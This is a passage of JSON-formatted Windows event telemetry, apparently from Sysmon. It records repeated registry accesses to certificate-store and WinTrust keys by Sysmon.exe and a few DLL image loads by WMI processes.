"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481050000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clusapi.dll", - "image_path": "C:\\Windows\\System32\\clusapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481360000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 